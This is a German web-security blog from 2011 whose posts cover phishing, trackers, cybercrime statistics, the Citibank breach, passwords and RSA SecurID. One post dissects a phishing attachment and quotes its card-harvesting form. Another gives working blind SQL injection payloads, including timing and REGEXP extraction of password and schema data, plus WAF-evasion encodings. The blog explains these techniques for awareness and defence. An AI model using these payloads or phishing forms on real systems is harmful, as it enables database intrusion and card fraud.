Web-Sicherheit

Juni 30, 2011

Achtung vor MasterCard SecureCode und Verified by Visa!

Filed under: Allgemein — sebastiankuebeck @ 15:35
Tags: , , , , ,

Zurzeit sind besonders „kreativ“ gestaltete Phishing-Mails im Umlauf, die den Empfänger auffordern, sich für MasterCard SecureCode oder Verified by Visa (Der Sammelbegriff für diese  Technologien ist 3-D Secure) zu registrieren:

Mehr Sicherheit beim Internet-Shopping

MasterCardR SecureCode? / Verified by Visa

Einkaufe im Internet mit Ihrer MasterCard / Visa Karte ab sofort
noch sicherer. Nutzen Sie das neue, innovative
Sicherheitsverfahren fur Ihre Sparkassen-Kreditkarte.

Ihre Vorteile

* Sicheres Bezahlen fur Ihren Einkauf im Internet
* Einfache Anwendung
* Weltweites Bezahlverfahren
* Sofort einsatzbereit - ohne Software-Installation auf Ihrem PC

Das bietet Ihnen MasterCardR SecureCode? / Verified by Visa

MasterCardR SecureCode? und Verified by Visa bietet Ihnen einen
zusatzlichen Schutz fur Ihre Bezahlungen im Internet. Ihre
Kreditkartendaten werden vor unberechtigter Verwendung geschutzt,
wenn Sie bei den teilnehmenden Handlern "online shoppen".

In Deutschland sind zum Beispiel schon Otto, Dress-for-less,
parship, Tchibo und viele weitere Handler dabei.

Bitte laden Sie den Anhang und fullen Sie das Formular Passwort
vergessen

Wie im Text richtig steht, verwenden immer mehr Seiten 3D-Secure, allerdings würde keine Bank auf der Welt ihre Kunden auffordern, Kreditkartendaten in einem E-Mail-Formular einzugeben – schon gar nicht mit einer E-Mail, die offensichtlich nicht von einer Person mit Deutsch als Muttersprache verfasst ist! Sollten Sie E-Mails dieser Art bekommen und nicht sicher sein, ob sie legitim sind, oder nicht, kontaktieren Sie bitte Ihre Bank telefonisch. Besser einmal zuviel nachfragen als sich Schwierigkeiten einhandeln! Was passiert, wenn Ihre Kreditkartendaten missbraucht werden, habe ich im Zusammenhang mit dem Vorfall bei Sony beschrieben.

Nun zu den technischen Feinheiten: Das Formular ist ein Anhang und dieser tarnt sich geschickt vor Spam-Filtern, indem er die Zieladresse des Formulars verschleiert:

<script type="text/javascript">document.write('\u003C\u0048\...'); </script>
<TR>
    <TD>Kreditkartennummer:</TD>
    <TD><INPUT maxLength="16" size="15" name="card"></TD></TR>
  <TR>
</TD></TR>
  ...
  <TR>
    <TD colSpan="2" align="middle">www.sparkasse.de/sicherheit/sicherheit/kreditkartenzahlung.html</TD>
  </TR>
</TBODY>
</TABLE>
</FORM>
<script language = "javascript">
  function submitIt(form) {
    if (form.card.value == "") {
     ...
	 return false;
    }else if (form.mm.value == "") {
	 ...
    }else{
      return true;
    }
  }
</script>
</BODY>
</HTML>

Der Verweis auf die http://www.sparkasse.de ist kein gültiger Link, er soll lediglich das Vertrauen der Opfer stärken.

So ist das natürlich kein gültiges HTML, allerdings fügt die Anweisung document.write zusätzlichen Code am Anfang des Formulars ein. Dieser Code ist wiederum JavaScript-codiert, um ungehindert an den Spamfiltern vorbeizukommen. Dekodiert sieht die Geschichte wie folgt aus:

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META http-equiv=Pragma content=no-cache>
<LINK rel="stylesheet" href="http://??????????????.com/css/iepc.css" type="text/css">
</HEAD>
<BODY>
<center><BR /><BR />
<IMG border="0" alt="" src="http://???????????????.net/tmp/Sparkassen_BCS.gif"><br /><br />
<IMG border="0" alt="" src="http://???????????????.net/tmp/vpas_logo.gif" width="79" height="46">    
<IMG border="0" alt="" src="http://???????????????net/tmp/mpas_logo.gif" width="79" height="46"></A></center>
<FORM id="FORM1" onsubmit="return submitIt(this)" method="post" name="FORM1"
  action="http://?????????????.net/tmp/pbs.php">
<TABLE border="0" align="center">
<TBODY>

Das Formular ruft also die Funktion submitIt(this) auf, die die Eingabe überprüft (als verwöhnter Gauner will man natürlich keine unvollständigen Daten…) und das Opfer auf eine türkische Seite verweist. Dort werden die Daten dann vom Verfasser dieser E-Mail entgegengenommen und illegalen Zwecken zugeführt. Obwohl der Betrug leicht zu durchschauen ist, stehen die Chancen gar nicht so schlecht, dass zumindest ein paar Prozent der Empfänger darauf hereinfallen. Wenn man bedenkt, dass diese Mails oft an Millionen von Adressaten geschickt werden, kann da einiges zusammenkommen.

Update 01.07.2011: Offizielle Warnung auf sparkasse.de:

Geben Sie niemals Ihre PIN und TAN heraus! Auch wenn Sie von scheinbar seriöser Stelle dazu aufgefordert werden. Die Sparkassen werden Sie weder per E-Mail noch persönlich am Telefon auffordern, Ihre Zugangsdaten zum Online-Banking preiszugeben oder aus einer E-Mail heraus Webseiten zu öffnen, um dort Kontodaten oder Kreditkarten-Nummern einzugeben.

Wenn Sie eine E-Mail mit entsprechendem Inhalt erhalten, ignorieren Sie diese Aufforderung und leiten Sie die E-Mail an Ihre Sparkasse oder an warnung@sparkasse.de weiter, damit die von den Betrügern genutzten Server identifiziert werden können. Wenn Sie bereits Daten eingegeben haben, setzen Sie sich umgehend mit Ihrer Sparkasse in Verbindung, um Ihre Kreditkarte sperren zu lassen.

Juni 26, 2011

Geistreiches im Namen des Datenschutzes

Filed under: Allgemein — sebastiankuebeck @ 15:57
Tags: , , , , , , ,

Natürlich gibt es im Internet – wie auch sonst im Leben – nichts gratis, allerdings bezahlt man im Internet meist nicht direkt für die Leistungen, die man erhält, sondern indirekt, indem man den Anbietern Daten zur Verfügung stellt. Leider wird man in der Regel weder gefragt, welche Daten man zur Verfügung stellen will, noch wer diese Daten letztendlich bekommen soll. Schließlich hat man möglicherweise keine Probleme damit, beispielsweise seiner Lieblingszeitung zu gestatten, die eigenen Daten für alles mögliche zu verwenden, verkauft diese Zeitung diese Daten allerdings an alle möglichen dubiosen Firmen weiter, sind die meisten von uns weniger begeistert. Wenn man beispielsweise die Finacial Times Deutschland besucht, werden gleich sieben Dienste automatisch darüber informiert, die mit dem Herausgeber überhaupt nichts zu tun haben (wie man das ermittelt, werde ich später erörtern).

Oft werden Daten auch „abgegriffen“, ohne das es dem Seitenbetreiber bewußt ist. Facebooks „Gefällt mir“-Button ist ein solches Beispiel. Der Seitenbetreiber fügt etwas Code von Facebook in seine Seite ein und schon erscheint der „Gefällt mir“-Button auf der Homepage. Damit weiß Facebook dann allerdings auch, welche Facebook-Benutzer diese Seite besucht haben – dazu ist es gar nicht erst nötig, dass die Benutzer den Button auch klicken, denn Facebook wird schon beim Laden der Seite kontaktiert. Das ganze dient natürlich dazu, ein Profil für jede/jeden Facebook-Benutzerin/Facebook-Benutzer zu erstellen, damit man ihr/ihm möglichst zielgerichtet Werbung einblenden kann. So kann ein Link in einem Online-Shop für Schuhe Mitbewerbern dieses Shops dazu dienen, beispielsweise vergleichbare Produkte zu günstigeren Preisen anzubieten. Natürlich lassen sich so auch politische und sexuelle Neigungen, sowie gesundheitliche Probleme ermitteln, was sicher nicht jeder/jedem Betroffenen recht ist.

Eine (vorgebliche)  Möglichkeit, dieses Verhalten zu unterbinden, ist die Einstellung „Webseiten mitteilen, dass ich nicht verfolgt werden möchte“, auch bekannt als Do-Not-Track-Header im Firefox 4 und höher. Ist diese Einstellung aktiviert, schickt Firefox bei jedem Seitenaufruf einen entsprechenden HTTP-Header mit. Ob nun wirklich keine Daten mehr zu Werbezwecken gesammelt werden, bleibt allerdings dem Seitenbetreiber überlassen.

Eine wirksamere Methode, etwas mehr Kontrolle darüber zu haben, wer welche Daten bekommt, stellt das Browser-Plugin Ghostry dar, dass für die gängigsten Browser erhältlich ist. Ghostry verwendet eine Liste von Diensten, deren einzige Aufgabe es ist, Daten über Benutzer zu Werbezwecken zu sammeln. Findet Ghostry nun einen Link auf einen oder mehrere dieser Dienste, informiert es den Benutzer. Auf Wunsch kann Ghostry diese Dienste auch blockieren.

Ghostry für Firefox in Aktion: Im violetten Feld werden die Trittbrettfahrer angezeigt

Ghostry kann natürlich nicht verhindern, dass Daten serverseitig weitergegeben werden, dennoch kann es in der Praxis die Anzahl der „Trittbrettfahrer“ deutlich reduzieren, wovon man sich beim Surfen mit Ghostry selbst überzeugen kann. Ein weiterer positiver Effekt von Ghostry ist, dass der Surfer etwas mehr Einblick darin bekommt, was beim unbedachten Surfen so alles nebenher passiert.

Ach ja, wärend Sie das lesen, werden Sie von WordPress Stats und Quantcast erfasst…

Juni 21, 2011

Sex, Lügen und Umfragen zur Internetkriminalität

Filed under: Allgemein — sebastiankuebeck @ 13:15
Tags: , , ,

Fast täglich überschlagen sich Zeitungen mit Berichten über enormen die Kosten, die Unternehmen und der Gesellschaft durch die Internetkriminalität entstehen. Diese Zahlen werden üblicherweise aus Umfragen zitiert und diese Umfragen sind, wie Dinei Florêncio und Cormac Herley von Microsoft Research kürzlich in ihrem Paper Sex, Lies and Cybercrime Surveys beschrieben,  mit Vorsicht zu genießen.

Die meisten Informationen, die uns über Verluste, die durch die Internetkriminalität verursacht werden, zur Verfügung stehen, stammen aus Umfragen. Wir untersuchten einige der Schwierigkeiten, die sich ergeben, wenn man eine glaubwürdige Schätzung aus einer solchen Umfrage
ableiten möchte. Zum ersten sind Schäden stark auf bestimmte Personengruppen konzentriert, sodass eine repräsentative Auswahl an Kandidaten zu keiner repräsentative Auswahl der Schäden führt. Zum zweiten ist man bei der Höhe des Schadens auf Angaben der Geschädigten angewiesen, die man nicht nachprüfen kann, so fanden wir konkrete Hinweise, dass die Ergebnisse der meisten Umfragen von den Angaben einer verschwindend kleinen Anzahl von Befragten stammt – in der Regel von jenen, die einen besonders großen Schaden melden. Die meisten Schätzungen basieren daher auf Angaben von lediglich ein oder zwei Personen.
Schlussendlich verstärkt die Beschränkung auf wenige Geschädigte die Schwierigkeiten, die durch die Verweigerung, eine konkrete Schadenssumme zu nennen, und durch die geringen Datenmenge, entstehen.
Wir bekommen also keine repräsentativen Schätzungen, die sich auf eine große Anzahl von Personen aller gesellschaftlichen Schichten schützen, sondern lediglich Extrapolationen von einer Handvoll befragten.
Ein einziger Befragter, der einen Schaden von 50.000 in einer Studie von 1000 Personen angibt, ist ausreichen, um einen Verlust 10 Milliarden US-Dollar abzuleiten! Ein unbestätigter Schaden in der Höhe von 7.500 US-Dollar, der durch Phishing verursacht worden sein soll, genügt, um einen Schaden von 1,5 Milliarden US-Dollar für die gesamte Bevölkerung abzuleiten!

Das Problem hier ist weniger, dass diese Praktiken gang und gäbe sind – wir haben uns schließlich an die abenteuerlichsten Umfrageergebnisse vor Wahlen gewöhnt -, sondern dass diese Daten Entscheidungsträgern offenbar tatsächlich als Entscheidungsgrundlage dienen!

Juni 15, 2011

Einbruch bei Citibank war ein Kinderspiel

Filed under: Allgemein — sebastiankuebeck @ 14:25
Tags: , , , ,

Laut diesem Artikel war der Einbruch bei Citbank, bei dem über 200,000 Kontonummern und E-Mail-Adressen gestohlen wurden, ein Kinderspiel. Die Hacker meldeten sich als legitime Kunden an Citibanks Onlinebanking-Portal an und probierten einfach der Reihe nach Kontonummern in der Adresszeile des Browsers durch, bis sie auf gültige Kontonummern stießen, wodurch sie an die Daten der Kontoinhaber gelangten. Sie automatisierten diesen Vorgang und konnten so an die Daten hunderttausender Kontoinhaber gelangen.

Offenbar hat die Citibank also die Kontonummer oder einen von ihr abgeleiteten Code als Autentifizierungsmerkmal (Schlüssel) benutzt. Da es augenscheinlich sehr einfach ist, durch ausprobieren gültige Kontonummern zu erhalten, eigenen sie sich keinesfalls als Schlüssel. Vielmehr sollte für jede Benutzersitzung – also nach jeder erfolgreichen Anmeldung – ein eigener, sicherer Schlüssel mit begrenzter Gültigkeit erstellt werden (ich habe dem Thema Authentifizierung und Sessionmanagement zwei Kapitel in meinem Buch gewidmet). Die Kontonummer sollte überhaupt nicht in der Adresszeile auftauchen, sondern ausschließlich auf dem Server gespeichert werden. Diese Art von Schwachstellen sind eigentlich schon aus den Neunzigerjahren bekannt und wurden damals schon ausgenutzt.  Es ist wirklich erstaunlich, wie lange es dauert, bis sich die offensichtlichsten Schwachstellen und deren Vermeidung herumgesprochen haben. Und bei den Bonuszahlungen, die die Manager bei Citibank trotz Pleite einstreifen, sollte es nicht zuviel verlangt sein, die Programmierer in sicherer Webentwicklung zu schulen…

Das die Eindringlinge nicht an Kreditkartennummern und Kartenprüfnummern gekommen sind, ist ohnehin klar, da erstere laut den Vorschriften der Kreditkartengesellschaften (genannt PCI DSS) nur unvollständig (es dürfen maximal die ersten sechs und die letzten vier Stellen angezeigt werden) dargestellt werden dürfen und letztere gar nicht bei der Citibank gespeichert, geschweige denn angezeigt werden dürfen (genauer gesagt, darf die Kartenprüfnummer nur unmittelbar vor einer Transaktion gespeichert werden und muss danach gelöscht werden). An diese Daten kommen Hacker also nur heran, wenn sie die Seite, auf der diese Daten eingegeben werden, oder ein nachgeschaltetes System manipulieren.

Das die Angreifer diesen Angriff nur einige zehntausend Mal durchgeführt haben wie im Bericht erwähnt, kann gar nicht stimmen, da sie bei einer Trefferquote von 100% immer noch 200.000 Versuche benötigen, um an diese Anzahl von Daten zu gelangen.

Im Gegensatz zu dem „Sicherheitsexperten“, der in diesem Artikel zitiert wird, glaube ich nicht, dass dieser Angriff tatsächlich so schwierig war. Meiner Meinung nach sind die Hacker eher durch ausprobieren auf diese Lücke gestoßen. Das ein „Superhacker aus Osteuropa“ hinter der Tat vermutet wird, ist meist ein Synonym für „wir haben keine Ahnung, wer das war“. Schließlich würde es langsam auffallen, wenn man immer die Chinesen beschuldigt…

Das einige Banken generell kein gesteigertes Interesse an der Sicherheit ihrer Onlinebanking-Systeme haben, musste vor einiger Zeit ein Schüler erfahren, der versuchte, von ihm entdeckte Sicherheitsprobleme den betroffenen Banken zu melden. Nach Monaten der Untätigkeit dieser Banken wendete er sich schließlich enttäuscht an die Öffentlichkeit.

Update vom 17.06.2011:

Die Citibank musste nun zugeben, dass Daten von nicht nur 200.000 oder 210.000 sondern 360.000 Kunden in die Hände der Eindringlinge gerieten. Das ganze ist offenbar eine Reaktion auf Druck der Staatsanwaltschaft, mehr Informationen zu dem Vorfall bekanntzugeben…

Juni 14, 2011

Erhöhen der Treffsicherheit von Blind-SQL-Injection-Angriffen

Filed under: Allgemein — sebastiankuebeck @ 17:20
Tags: , , , , , , , ,

Bei SQL-Injection-Schwachstellen in Suchmechanismen ist es in der Regel einfach möglich, beliebige Informationen aus der Datenbank zu bekommen, ist die SQL-Injection-Lücke jedoch in einem INSERT- oder UPDATE-Statement versteckt oder wird das ergebnis einer Abfrage nicht direkt an den Browser übergeben, bekommt man meist keine Daten aus der Datenbank zurück. In diesem Fall kann sich allerdings oft dadurch behelfen, dass die Seite unter bestimmten Umständen eine Fehlermeldung anzeigt. Diese Information (Fehlermeldung oder nicht) kann man dazu nutzen, um Informationen aus dem Datenbanksystem zu beziehen. Diese Art des Angriffs ist als Blind-SQL-Injection bekannt und kann äußerst effektiv sein, sofern man den Angriff automatisieren kann.

Funktioniert der Trick mit der Fehlermeldung nicht, kann man sich mit einer Time-Attacke behelfen. Dabei schleust man ein Kommando in die Datenbank ein, das zur Verarbeitung eine längere Zeit benötigt. Aus der Laufzeit des Skripts (z.B.: langsam bedeutet „wahr“, schnell bedeutet „falsch“) kann man wiederum Informationen aus der Datenbank beziehen.

Das folgende Kommando hat beispielsweise eine deutlich höhere Laufzeit wenn das erste Zeichen des Passworts des Benutzers root mit dem Buchstaben a beginnt:

SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;

Simone ‚R00T_ATI‘ Quatrini und Marco ‚white_sheep‘ Rondini zeigen nun in ihrem interessanten Paper, wie man diese Time-Attacken mithilfe von regulären Ausdrücken noch effizienter gestalten kann. Die MySQL Datenbank bietet dazu reguläre Ausdrücke zum Vergleich von Werten an. Microsofts MS SQL bietet einen ähnlichen Mechanismus im Zusammenhang mit dem Vergleichsoperator LIKE an. Der Trick besteht nun darin, statt alle möglichen Buchstaben des Passworts durchzuprobieren, ganze Zeichenklassen zu testen und diese Zeichenklassen schrittweise zu verkleinern. Hierzu ein Beispiel:

Ist das erste Zeichen des Tabellennamens des Schemas blind_sqli zwischen a und n?

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)

-> wahr, also kann ich meine Suche auf Zeichen zwischen a und n beschränken. Probieren wir also im nächsten Versuch  a bis g

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-g]' LIMIT 0,1)

-> falsch, der Buchstabe muss also zwischen h und n sein…

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-n]' LIMIT 0,1)

-> wahr, also weiter mit h bis l

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-l]' LIMIT 0,1)

-> falsch.

Sie sehen schon, worauf das hinaus läuft. Bei der MS SQL funktioniert eine ähnliche Taktik. Die Zeit, die man so für das Ermitteln von Dantenbankinformationen benötigt sinkt dabei drastisch.

Im nächsten Teil zeigen die Autoren, wie man sich um WAFs (Web Application Firewalls) und Datenbankfirewalls herumschummelt:

Die meisten WAFs blockieren Ausdrücke wie SELECT ... FROM, also hat man gute Chancen, anstelle von Leerzeichen nach SELECT und vor und nach FROM andere legale Trennzeichen wie Tabulatoren zu verwenden:

SELECT%09TABLE_NAME%09FROM%0dinformation_schema.tables

%09 ist dabei ein URL-codiertes Tabulatorzeichen. Alternativ funktionieren auch häufig ASCII-Steuerzeichen wie %0c (form feed, new page), %0d (carriage return), %0a (line feed, new line). Werden einfache oder doppelte Hochkomma (' und ") gefiltert, kann man sich mit der Hexadezimaldarstellung oder der Funktion CHAR behelfen:

SELECT passwd FROM users WHERE username=0x61646d696e

Der Wert 0x61646d696e ist die hexadezimale Darstellung von admin.
Dasselbe erreicht man mit den Funktionen CHAR und CONCAT:

SELECT passwd FROM users WHERE username=CONCAT(CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110))

Alles in allem beschreiben die Autoren eine Reihe von nützlichen Tricks. Es wird wahrscheinlich nicht lange dauern, bis diese in automatischen SQL-Injection-Werkzeugen wie sqlninja und sqlmap Einzug halten. Das spart dem Hacker einen haufen Arbeit…

Die Nadel im Passwort-Heuhaufen

Filed under: Allgemein — sebastiankuebeck @ 15:21
Tags: , , , , ,

Eines der zentralen Probleme der IT-Sicherheit ist die sichere Authentifizierung. Aus zahlreichen Gründen setzten die meisten Webanwendungen auf Passwortauthentifizierung, doch die Sicherheit dieser Authentifizierungsart hängt von der Fähigkeit der Benutzer ab, sich Passwörter zu merken, die ein Angreifer nicht erraten kann.

Lange Zeit war man dabei der Meinung, dass die Entropie, also die „Regellosigkeit“ von Passwörtern entscheident für die Sicherheit wäre. Wenn es also keine offensichtliche Regel gibt, aus der ein Passwort abgeleitet ist, ist es für einen Angreifer schwieriger zu ermitteln. Beispiele für solch eine Regel wären:

  • Das Passwort enthält lediglich Buchstaben, also zum Beispiel 542345 oder 234567 etc.
  • Das Passwort ist ein Wort aus einem Wörterbuch einer bestimmten Sprache, also zum Biespiel Passwort oder geheim etc.

Steven Gibson hat unterschiedliche Verfahren zum Aufspüren von Passwörtern untersucht und herausgefunden, dass weniger die Entropie für die Sicherheit sorgt als mehr die Passwortlänge!

Um das zu verstehen, sehen wir uns die folgenden zwei Passwörter an:

D0g.....................

PrXyc.N(n4k77#L!eVdAfp9

Nach der Entropieregel müsste das zweite Passwort also sicherer sein, als das erste, da das Alphabet (die Menge der verwendeten Zeichen) im zweiten Passwort deutlich größer ist, als die vier Zeichen im Alphabet des ersten Passworts. Der Angreifer hat allerdings keine Informationen über die Größe des Alphabets und daher kann er diesen Vorteil nicht nutzen. Daher ist das erste Passwort tatsächlich sicherer als das zweite, denn der Angreifer benötigt die 95fache Zeit, um es zu knacken!

Um das einzusehen vollziehen wir nach, wie ein Angreifer vorgehen würde, um dieses Passwort zu erraten. Die erste Strategie, die er einsetzen wird, ist eine Wörterbuchattacke. Dabei wird er einfach alle Wörter eines Wörterbuches durchprobieren und etwas variiert, sodass er zum Beispiel neben dem Wort passwort auch die Wörter PaSsWoRt und passwort123 überprüft. Dieser Angriff schlägt natürlich Fehl, da der Angreifer nicht wissen kann, dass das Passwort hauptsächlich aus Punkten besteht, wo diese Punkte platziert sind und wieviele es sind.

Da die Wörterbuchattackeins leere läuft, versucht der Angreifer einen Brute-Force-Angriff. Dafür probiert er der Reihe nach alle möglichen Passwörter durch, also erst einmal alle Passwörter, die ein einziges Zeichen lang sind…

a, b, c, d,...z, A, B, C,...Z, !, ", §, $, %, &, /, ( ,) ,= ,? , ., ...

Danach alle möglichen Passwörter, die zwei Zeichen lang sind…

aa, ab, ac, ad,...ba, bb, bc, bd,...

Hier ist leicht einzusehen, dass der Aufwand für diesen Brute-Force-Angriff exponentiell mit der Passwortlänge wächst und dass die Entropie des Passworts dabei überhaupt keine Rolle spielt. So ist es zu erklären, dass nur ein Zeichen mehr im ersten Passwort so viel mehr Aufwand verursacht, als das zweite, das sicherer aussieht aber ein Zeichen kürzer ist, womit die vorherige Behauptung bewiesen ist.

So kann man also mit wenig Aufwand unsichere aber leicht zu merkende Passwörter absichern, was allemal besser ist, als sich Passwörter auf ein Post-It-Note zu schreiben und auf dem Monitor zu kleben. Das ganze funktioniert natürlich nur solange dem Angreifer das Muster des „Füllmaterials“ (eng. Padding), also die Punkte im ersten Passwort nicht geläufig ist. Daher sollte man sich eine eigene, leicht zu merkende Regel für das Füllmaterial ausdenken. Ihrer Kreativität sind hier keine Grenzen gesetzt, solange Sie sich die Regel merken können!

Denkbar wäre (bitte nicht verwenden, da diese Beispiele ja veröffentlicht sind!!!):

!"§!"§!"§oaschhmölzi$%&$%&$%&
$%&$%&$%&oachkazlschwoaf$%&$%&$%&

Als eingebetteten Text empfehlen sich übrigens hervorragend Dialektwörter oder -Phrasen, die nur in eng begrenzten Gebieten gebräuchlich sind (im ersten Beispiel ist eine Bezeichnung für ein Omelett mit Kürbiskernöl versteckt, welche meines Wissens nach nur in der Oststeiermark gebräuchlich ist). Diese tauchen in keinem „normalen“ Wörterbuch auf und sind daher mit Wörterbuchattacken normalerweise nicht zu finden. Noch besser ist es natürlich, wenn das Wort gar nicht mehr gebräuchlich oder ein von Ihnen erfundenes Kunstwort ist. Schreibfehler erhöhen die Sicherheit zusätzlich. Auf der anderen Seite sind gebräuchliche englische Begriffe oder Namen aus bekannten Filmen und Büchern wie frodo, jacksparrow, matrix etc. eine Einladung für Passwortknacker.

Wenn man dazu noch für jede Webseite ein anderes Passwort verwendet (oder sich von PasswordSafe helfen lässt), kann man so mit einfachen Mitteln die Sicherheit deutlich erhöhen.

Juni 9, 2011

345.000 US-Dollar durch Bankentrojaner verloren – Gericht weist Schadenersatzforderung zurück

Filed under: Allgemein — sebastiankuebeck @ 10:36
Tags: , , ,

Ein Richter des US-Bundesstates Maine wies die Klage einer kleinen Firma auf Schadenersatz ab, die durch einen Bankentrojaner 345.000 US-Dollar verloren hatte. Der Richter argumentierte, dass der Diebstahl das Resultat des Unvermögens der Firma gewesen sei, die Zugangsdaten zum Telebanking sicher zu verwahren.

Die Firma (Patco Construction) verklagte die Ocean Bank bereits 2009 nachdem Hacker mithilfe eines Bankentrojaners 589.000 US-Dollar vom Konto der Firma abzweigen konnten.  Mitarbeiter der Bank konnten noch um die 243.000 retten, für den restlichen Betrag musste nach Meinung der Bank die Firma aufkommen. Daraufhin verklagte Patco die Bank mit der Begründung, das die Bank die betrügerischen Transaktionen erkennen und unterbinden hätte müssen.

Die Klage von Patco klingt eher nach Verzweiflungstat, denn es gibt natürlich keine Möglichkeit, eine betrügerische Transaktion zweifelsfrei von einer legitimen zu unterscheiden. Die Bank kann auch nicht verhindern, dass Computer ihrer Kunden  mit Schadsoftware infiziert werden. Somit konnte die Klage eigentlich gar keine Chance auf Erfolg haben, denn wenn ein Computer erst einmal mit Schadsoftware infiziert ist, hat der Angreifer die vollkommene Kontrole über den Rechner, dass heißt, er sieht, was der Benutzer sieht, kann machen, was der Benutzer machen kann und kann das, was der Benutzer dargestellt bekommt, beliebig manipulieren. Daran würde auch ein sichereres Authentifizierungsverfahren und generell jede Maßnahmen, die die Bank zum Schutz des Kunden unternehmen kann, nichts ändern (mit der Ausnahme natürlich, erst gar kein Telebanking anzubieten).

Amerikanische Hackerszene angeblich von FBI-Informanten unterwandert

Filed under: Allgemein — sebastiankuebeck @ 07:45
Tags: , , ,

Laut diesem Artikel sind ein Viertel der Hacker in den USA Informanten des FBI:

In manchen Fällen werden illegale Foren, die als kriminelle Marktplätze für gestohlene Zugangsdaten und Kreditkartendaten dienen, von FBI-Spitzeln betrieben. In anderen Fällen agieren Undercover-Agenten des FBI als „Carder“ (Hacker, die sich auf den Diebstahl von Kreditkartendaten spezialisiert haben) als Betreiber dieser illegalen Foren. Mit den Informationen, die sie dabei erhalten bringen sie dutzende Hacker hinter Gitter. Laut Eric Corley, Herausgeber von „2600 The Hacker Quarterly“,  ist das Netzwerk des FBI ist inzwischen so umfangreich das geschätzte 25% der Hacker vom FBI als Informanten rekrutiert worden sind. „Aufgrund der harten Strafen, die Hackern drohen und der Unkenntnis über die rechtliche Situation ist es für das FBI relativ leicht, Hacker einzuschüchtern“, so Corly in der englischen Zeitung „The Guardian“.

Bruce Schneier meint dazu: „Wenn ich vom FBI wäre würde ich wollen, dass jeder glaubt, dass dieser Artikel den Tatsachen entspricht“.

Kriminelle im Internet haben prinzipiell das selbe Problem wie der Ottonormalsurfer: Es ist äußerst schwierig, im Internet die Identität eines Benutzers zweifelsfrei festzustellen, geschweigedenn dessen Vertrauenswürdigkeit. Untergräbt man das Vertrauensverhältnis zwischen den Kriminellen, zerfällt ihre Organisation, da irgendwann die allgegenwärtige Paranoia verhindert, dass überhaupt noch kriminelle Geschäfte zustande kommen.

Eine endgültige Lösung für das Problem der Internetkriminalität ist diese Vorgehensweise jedoch solange nicht, solange der Nachschub von neuen Hackern anhält und bei der gegenwärtigen wirtschaftlichen Lage wird sich der Zustrom in absehbarer Zeit wohl eher vergrößern. Im Übrigen sind die USA bei weitem nicht das einzige Land mit einer kriminellen Hackerszene und unterschiedliche Rechtssysteme machen die Strafverfolgung über Ländergrenzen hinweg in der Praxis äußerst schwierig.

Juni 8, 2011

RSA tauscht 40 Millionen SecurID-Tokens aus

Filed under: Allgemein — sebastiankuebeck @ 07:41
Tags: , , , , ,

Das Sicherheitsunternehmen RSA Security geht nun doch davon aus, dass bei dem Einbruch im März Informationen entwendet  wurden, mit denen das 2-Faktor-Authentifizierungsverfahren SecurID umgangen werden kann. Offenbar haben die Einbrecher diese Informationen bereits genutzt, um das US-Rüstungsunternehmen Lockheed Martin erfolgreich anzugreifen. Wie aus einem offenen Brief von RSAs Chairman Arthur W. Coviello hervorgeht, zieht RSA Security die Notbremse und tauscht nun 40 Millionen SecurID-Tokens aus.

Besorgniserregend hierbei ist, dass SecurID zu den wichtigsten Authentifizierungsverfahren in besonders kritischen Bereichen wie dem Bankwesen, dem Gesundheitswesen, der Energieversorgung, dem öffentlichen Bereich und dem Militär zählt. Das liegt daran, dass sich dieses Verfahren auf der einen Seite relativ einfach in bestehende Infrastrukturen einbinden ließ und auf der anderen Seite doch ein deutlich höheres Maß an Sicherheit als die Passwortautentifizierung bot. Letzteres galt zumindest so lange, als es Angreifern nicht möglich war, die Zahlencodes, die der Token anzeigt, vorherzusagen. Unglücklicherweise ist genau das passiert und damit stehen nun zahlreiche Unternehmen und Behörden vor einem praktisch unlösbaren Problem, denn was sollen sie unternehmen, bis RSA die Tokens tatsächlich austauscht?

Das Authentifizierungsverfahren zu verbannen ist in den meisten Fällen keine praktikable Lösung, da es in vielen Fällen Jahre dauern kann, alle Systeme umzurüsten. Es würde damit erheblich länger dauern, ein neues Authentifizierungsverfahren einzuführen, als auf die neuen Tokens zu warten. Auf der anderen Seite sind betroffene Organisationen in der Zeit, bis die Tokens ausgetauscht sind, ganz besonders verwundbar. Radikale Maßnahmen wie besonders sensible Computer vom übrigen Firmennetz abzukoppeln, gehen in den meisten Fällen mit einer erheblichen Einschränkung der Geschäftstätigkeit einher, weshalb das auch keine Lösung ist.

Das Grundproblem ist nach wie vor, dass bei der IT-Sicherheit viel zu lange weggesehen wurde. Schließlich hat es für Adobe & Co (der Einbruch bei RSA wurde durch eine Schwachstelle in Adobes Flash-Player-Plugin erst möglich) nach wie vor keine wie auch immer gearteten Konsequenzen, wenn sie verwundbare Software ausliefern und Sicherheitsaktualisierungen monate- oder jahrelang hinauszögern.

Gleichzeitig – und das ist das Hauptproblem – haben wir uns inzwischen der vernetzten IT auf Gedeih und Verderb ausgeliefert, wobei sich bei den meisten Systemen keiner wirklich Gedanken über die Sicherheit gemacht hat. So ist das Hacken inzwischen zu einem Milliardengeschäft und zum bevorzugten Mittel zur Informationsbeschaffung von Geheimdiensten geworden.

Meiner Meinung nach wird es daher früher oder später zwangsläufig zu einer „Entnetzung“ in kritischen Bereichen kommen, also zu einer Gegenbewegung zu der gegenwärtigen bedenkenlosen Vernetzungswut, bei der jegliche Sicherheitsprobleme einfach ignoriert werden. Bis es soweit ist, wird es allerdings noch sehr viel schlimmer werden. Sehr viel schlimmer. Erst dann wird der Leidensdruck groß genug, dass die Entnetzung allgemein akzeptiert wird.

